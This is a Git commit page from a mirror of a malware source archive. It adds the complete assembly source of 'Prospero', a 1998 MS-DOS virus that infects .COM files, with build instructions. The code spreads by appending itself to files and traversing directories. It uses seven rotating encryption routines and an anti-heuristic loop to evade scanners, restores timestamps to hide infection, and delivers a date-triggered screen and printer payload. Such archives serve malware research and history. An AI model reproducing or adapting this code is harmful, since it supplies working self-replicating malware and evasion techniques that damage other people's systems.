daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:55:26 -06:00
committed by GitHub
parent f76af55eb4
commit b60161f008
99 changed files with 46287 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.prospero.asm
+761
View File
@@ -0,0 +1,761 @@
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
;-------------------------------------------------------------------------
; Prospero Virus
;
; (C) Opic [Codebreakers 1998]
;-------------------------------------------------------------------------
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
;IMPORTANT NOTES:
;compiled with TASM 4.1 and TLINK 7.1
;to compile: TASM prospero.asm
; TLINK /t prospero.obj
;Rename Prospero.com Prospero.exe (this is to avoid prospero infecting
;itself first generation only
;Type: appending .com infector
;virus size: 1st Gen 1723 bytes
;infected files grow 1712 bytes
;searches *.c* then comfirms *.COM
;does NOT infect command.com
;nor files bigger the 63824 bytes
;Encryption: 5 types (XOR, NEG, ROR, ROL,and NOT)---|
; used in combination for 7 algorithms <---------|
;Polymorphic: Yes (well Oligomorphic if you wanna get picky), there is a
;stock of 7 different 3op encryption algorithms and delta offsets rutines
;from which the virus chooses (a different type of encryption and delta
;offset is choosen every day of the week). the rest are safely
;encrypted inside the virus body.
;antiheuristics: yes.
;Directory Transversal: DotDot method
;restores infected file time/date stamps
;restores infected file DTA
;Rate of infection:no more then 7 per run
;restores infected file attributes
;payload criteria:The virus will manifest a payload on
;the 1st day of the month if the minutes are above 30.
;payload:a large graphical color text effect as well as a message
;is delivered from through printer:
;************************PROSPERO!**************************
;There is a path to the trancendece of the dollar: Embark
;rich beggars! Does magic bring prosperos to his knees?
;Reading pretty twilight, making grass uncertain?
;Oh,all that christmas snow shouldered by one birthday suit!
;The fate of the world under his armpit like a thermometer?
;Rejoice Villains! Your time has come.
;**************(C) Opic [CodeBreakers,98]*******************
;EXTRA SPECIAL GREETS AND THANX GO OUT TO:
;DARX_KIES, OWL[FS], DARKMAN, MIKEE, ALL the CodeBreakers and the countless
;others that have helped me learn and progress.
;
;OTHER: it has been awhile since I have looked at this virus, but it has come
;to my attention that it may have a bug in the directory transversal rutine,
;im not particularly interested in working on this virus any further, but
;felt it should be noted for the record (suprisingly it made it to the
;supplimentals on "the wild list").
;------------------------------------------------------------------------
.286
prospero Segment
Assume CS:prospero, DS:prospero, ES:prospero
Org 100H
jumps
start:
mov cx,0ffffh ;loop to kill heuristic scanners
no_av1:
jmp no_av2
mov ax,4c00h
int 21h
no_av2:
loop no_av1
call delta ;call delta
delta: ;duh!
pop bp ;pop bp
sub bp,offset delta ;fer the distanc
Nop ;You need those two nops.
Nop ;
;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
;----------setup-----------------
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call encrypt ;
jmp c_start ;
value db 0 ;decrypt value
stop: ;label for later
;---------to be polyed------------
encrypt: ;padding
DB 20 Dup(90H)
ret ;=21 for crypt
;--------start of crypt body-------
c_start: ;part to crypt
;------clear infection counter----
mov byte ptr [bp+counter],0
mov cx,3 ;get first 3
mov di,100h ;restore em!
lea si,[bp+buff]
rep movsb
;--------save DTA------------------
lea di,[bp+NewDTA]
mov si,80h ;DTA to save
mov cx,2Ah ;length of DTA 2ah
rep movsb ;save it
;-----------first------------------
find_first: ;find first
mov ah,4eh ;file
find_next: ;we need this lata
lea dx,[bp+filemask] ;what we is lookin fer
int 21h ;now!
jnc verify ;find one? infect
;----------------DT--------------------------
dotdot:
lea dx,[bp+dot] ;get dot from dataseg
mov ah,3Bh ;cd
int 21h ;go!
jnc find_first ;find first in new dir
;------------payload check--------------------
check_payload: ;payload check
mov ah,2ah ;system date
int 21h ;now!
cmp dl,1 ;is it the first?
je n_check ;yes? second check
jmp close
n_check:
mov ah,2Ch ;internal clock
cmp cl,30d ;minutes 30 or above?
jae payload ;yes? lets do it!
jmp close ;no? lets chill
;---------graphic payload-------------------------
payload:
mov ax,13 ;set mode 13h
int 10h ;call bios
mov dx,030ah;dh/dl are the line/column coordinates
xor bh,bh ;on page 0
mov ah,02h ;02h=move cursor to
int 10h ;go
push cs ;
pop ds ;
lea si,[bp+ offset message1];1st message
mov cx,14 ;length
show: ;shows the message
lodsb ;keep goin
mov bl,2 ;color
mov ah,0eh ;write one letter
int 10h ;
loop show ;till we do em all
add dx,507 ;get ready fer #2
mov ah,02h ;put cursor
int 10h ;
lea si,[bp+ offset message2];mess2
mov cx,27 ;length
show2: ;
lodsb ;
mov bl,30 ;color
mov ah,0eh ;
int 10h ;
loop show2 ;
mov ah,01h ;begin of printer sect of payload
mov dx,0h
int 17h ;int for initializing printer
lea si,string1
mov cx,EndStr1-String1
PrintStr:
mov ah,00h
lodsb
int 17h
loop PrintStr
mov ax,4c00h;exit
int 21h ;dos
;---------ret to host-------------
close: ;exit stage left
;---------restore DTA------------------------
lea si,[bp+NewDTA] ;saved DTA
mov di,80h ;area it was
mov cx,2Ah ;length
rep movsb ;write it
push 100h ;start o file
ret ;dar!
;-------start .com checks--------
verify:
mov cx,13d ;max size of file name
mov si,9eh ; !!!!
;---------*.com and not command--------
compare:
lodsb ;find the point!
cmp al,"." ;is it?
jne compare ;no? try again
inc si ;yes? next letter
cmp word ptr [si], "MO" ;does it spell .COM?
je check_for_command_com ;no find next!
jmp close_file
check_for_command_com:
cmp word ptr [bp+9eh+2], "MM" ;is it command.com?
je close_file ;yes? next!
;-------------save attribs-----------------
infect: ;duh!
Mov si,95h ; !!!! get dta
mov cx,09h ;mov it to cx
lea di,[bp+attribs] ;save em
rep movsb ;move em
;-------------clear atrribs----------------
Mov dx,9Eh ;filename in DTA
mov ax,4301h ;so we can infect
xor cx,cx ;all .coms
int 21h ;
mov ax,3d02h ;open file fer read/write
mov dx,9eh ;get info
int 21h ;go!
xchg bx,ax ;put ax in bx
;---------------time/date-----------------------
mov ax,5700h ;get time/date stamp
int 21h ;save em----|
push dx ; <-------|
push cx ; <-------|
;--------------rand xor value--------------------
in al,40h ;new crypt value
mov byte ptr [bp+value],al ;put it place
;--------------first 3-----------------------------
mov ah,3fh ;read 3 bytes from the file.. too
;
mov cx,5 ;be replaced with a jump to the virus
lea dx,[bp+buff] ;load buffer in dx
int 21h ;go!
;------------size check---------------------
mov di,9Ah
cmp word ptr [di],63824 ;size check! no bigger then 63824 bytes
jae close_file ;
;-----------prev infected?----------------------
infect_check:
pusha ; i saved registers since i did not take the time
; to check which registers must be saved
mov ax,4200h ; set r/w pointer to start of file +1
xor cx,cx
mov dx,1
int 21h
mov ah,3fh ; read the jump displacement
mov cx,2
lea dx,opbuf+bp
int 21h
mov ax,opbuf+bp
add ax,3 ; add 3 to jump displacement to get offset
; of marker ':('
mov dx,ax
mov cx,0
mov ax,4200h ; set pointer to marker offset
int 21h
mov ah,3fh ; read 2 bytes again
mov cx,2
lea dx,opbuf+bp
int 21h
popa ; registers popped here
cmp opbuf+bp,'(:' ; check for marker
je close_file ; marker found? close file
jmp short over_opbuf ; otherwise proceed
over_opbuf:
; mov si,9ah ;
; mov ax,word ptr [si] ;infected?
; sub ax,virus_end - start + 3 ;check it?
; cmp ax,word ptr[bp+buff+1] ;compare..
; je close_file ;already infected? outta here!
;----------infect already-------------------
mov si,9ah
mov ax,word ptr[si]
sub ax,3
mov word ptr[bp+three+1],ax
mov ax,4200h ;start of file
xor cx,cx ;clear
xor dx,dx ;cx and dx
int 21h ;now!
;------------write jump----------------------
mov ah,40h ;write the 3 byte jump
lea dx,[bp+three] ;load em
mov cx,3 ;move em
int 21h ;now!
jmp next
close_file: ;
jmp restc ;
;---------write cryptor------------------------------
next: ;
mov ax,4202h ;end of file
xor cx,cx ;clear
xor dx,dx ;em
int 21h ;now!
;---------POLY: cryptor-------------------------------
;pick random cryptor from stock of 7
poly: ;determine 2nd part of cryptor
mov ah,2ah ;get day of week
int 21h ;now
;------find which cryptor to write to infection-----------
or al,al ;is it.....sunday
jz d0 ;
cmp al,001h ;mon
je d1 ;
cmp al,002h ;tue
je d2 ;
cmp al,003h ;wed
jne td4 ;
Jmp d3
td4:
cmp al,004h ;thur
jne td5 ;
Jmp d4
td5:
cmp al,005h ;fri
jne td6 ;
Jmp d5
td6:
Jmp d6
;-------load the cryptor we need--------------------
d0: ;pick and write Zero cryptor
mov al,[bp+value]
mov [bp+value0],al
mov ah,40h
lea dx,[bp+del] ;
mov cx,del1 - del ;
int 21h ;
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt
jmp write
d1: ;pick and write 1st cryptor
mov al,[bp+value]
mov [bp+value1],al
mov ah,40h
lea dx,[bp+del1] ;
mov cx,del2 - del1 ;
int 21h ;
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt1
jmp write
d2: ;pick and write 2nd cryptor
mov al,[bp+value]
mov [bp+value2],al
mov ah,40h
lea dx,[bp+del2] ;
mov cx,del3 - del2 ;
int 21h ;
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt2
jmp write
d3: ;pick and write 3rd cryptor
mov al,[bp+value]
mov [bp+value3],al
mov ah,40h
lea dx,[bp+del3] ;
mov cx,del4 - del3 ;
int 21h ;
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt3
jmp write
d4: ;pick and write 4th cryptor
mov al,[bp+value]
mov [bp+value4],al
mov ah,40h
lea dx,[bp+del4] ;
mov cx,del5 - del4 ;
int 21h ;
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt4
jmp write
nope:
jmp close
d5: ;pick and write 5th cryptor
mov al,[bp+value]
mov [bp+value5],al
mov ah,40h
lea dx,[bp+del5] ;
mov cx,del6 - del5 ;
int 21h ;
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt5
jmp write
d6:
mov al,[bp+value]
mov [bp+value6],al
mov ah,40h
lea dx,[bp+del6] ;
mov cx,noc - del6 ;
int 21h
lea si,[bp+c_start] ;
lea di,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
call crypt6
;-------write crypted area--------------------
write:
mov ah,40h ;write encrypted area
lea dx,[bp+virus_end] ;load
mov cx,virus_end - c_start ;move
int 21h ;now!
count:
inc byte ptr [bp+counter] ;add one
;-----------restore time/date---------------
restc:
mov ax,5701h ;restore stamps
pop cx ;remember?
pop dx ;we saved these!
int 21h ;
;-------------close--------------------------
mov ah,3eh ;close file
int 21h ;go!
;------------restore attribs-----------------
mov ax,4301h ;set attribs
Mov dx,9Eh ; !!!! name in DTA
xor cx,cx ;clear!
mov cl, byte ptr [bp+attribs] ;attribs in cl
int 21h ;go
cmp byte ptr [bp+counter],7 ;this isnt completly
;accurate due to the
;the fact that it
;counts fails from
;infection checks
;but i kinda like having
;a semi random infection check
ja nope ;and exit
;--------------next and infection check----------
next1:
mov ah,4Fh ;find next file
jmp find_next ;continue!
;-----------our stock of cryptors------------
del:
db ':('
cli ; 1
db 0E8h,0,0 ; 3
pop ax ; 1
sti ; 1
sub ax,offset delta+1 ; 3
xchg bp,ax ; 1 =10
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt ;
Jmp Del1
Value0 db 0
crypt:
lodsb ;
Push CX
Nop
Mov CL,4
rol al,CL ;
Nop
neg al ;
rol al,CL ;
Nop
Pop CX
stosb ;
Nop
loop crypt ;
ret ;21 !!!
Nop
Nop
;--------------------------------------------
del1:
db ':('
db 0E8h,00,00 ;
sti ;
pop bp ;
xchg bx,ax ;
sub bp,offset delta ;
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt1 ;
Jmp Del2
Value1 db 0
crypt1:
Nop
lodsb ;
Nop
neg al ;
Push CX
Mov CL,4
ror al,CL ;
Pop CX
Nop
neg al ;
Nop
stosb ;
Nop
loop crypt1 ;
ret ;21 !!!
Nop
;------------------------------------------
del2:
db ':('
cld ;
db 0E8h,0,0 ;
pop bp ;
clc ;
sub bp,offset delta+1 ;
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt2 ;
Jmp Del3
Value2 DB 0
crypt2:
Nop
Nop
lodsb ;
not al ;
nop ;
xor al,byte ptr [bp+value] ;
nop ;
not al ;
nop ;
Nop
stosb ;
loop crypt2 ;
Nop
ret ;21 !!!
;---------------------------------------
del3:
db ':('
sti ; 1
nop ; 1
db 0E8h,0,0 ; 3
pop bp ; 1
sub bp,offset delta+2 ; 4=10
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt3 ;
Jmp Del4
Value3 db 0
crypt3:
lodsb ;
Push CX
Nop
Nop
Mov CL,4
ror al,cl ;
not al ;
Nop
ror al,cl ;
Nop
Pop CX
stosb ;
loop crypt3 ;
Nop
ret ;21 !!!
Nop
;---------------------------------------
del4:
db ':('
db 0E8h,0,0 ; 3
pop ax ; 1
xchg bx,ax ; 1
xchg bx,ax ; 1
sub ax,offset delta ; 3
xchg bp,ax ; 1
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt4 ;
Jmp Del5
Value4 db 0
crypt4: ;
lodsb ;
Push CX
Mov CL,4
xor al,byte ptr [bp+value] ;
rol al,cl ;
xor al,byte ptr [bp+value] ;
Pop CX
stosb ;
loop crypt4 ;
ret ;21 !!!
;--------------------------------------
del5:
db ':('
db 0E8h,0,0 ; 3
nop ; 1
pop ax ; 1
nop ; 1
sub ax,offset delta ; 3
xchg bp,ax ; 1 ; = 10
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt5 ;
Jmp Del6
Value5 db 0
crypt5: ;
Nop
lodsb ;
not al ;
Push CX
Nop
Mov CL,4
ror al,cl ;
Nop
Pop CX
Nop
not al ;
Nop
stosb ;
Nop
loop crypt5 ;
ret ;21 !!!
;--------------------------------------
del6:
db ':('
sti ; 1
clc ; 1
db 0E8h,0,0 ; 3
pop ax ; 1
sub ax,offset delta +2 ; 3
xchg bp,ax ; 1=10
lea si,[bp+c_start] ;
mov di,si ;
mov cx,virus_end - c_start ;
call crypt6 ;
Jmp Noc
Value6 db 0
crypt6: ;
lodsb ;
Push CX
Mov CL,4
ror al,CL
Nop
xor al,byte ptr [bp+value]
ror al,CL
Nop
Pop CX
stosb
Nop
loop crypt6
ret
noc: ;21 !!!
;-----------DATA--------------------------
newdta db 2ah dup(?)
filemask db '*.c*',0
three db 0e9h,0,0
buff db 0cdh,20h,0
dot db '..',0
message1 db "Prospero Virus" ;14
message2 db "(C) Opic [CodeBreakers '98]" ;27
counter db 0
attribs db 0h
opbuf dw 0
String1 db '************************PROSPERO!**************************',0dh,0ah
db 'There is a path to the trancendece of the dollar: Embark',0dh,0ah
db 'rich beggars! Does magic bring prosperos to his knees?',0dh,0ah
db 'Reading pretty twilight, making grass uncertain?',0dh,0ah
db 'Oh,all that christmas snow shouldered by one birthday suit!',0dh,0ah
db 'The fate of the world under his armpit like a thermometer?',0dh,0ah
db 'Rejoice Villains! Your time has come.',0dh,0ah
db '**************(C) Opic [CodeBreakers,98]*******************',0Ch
EndStr1:
;--------------------------------------------------------------------------
Virus_End:
prospero Ends
End Start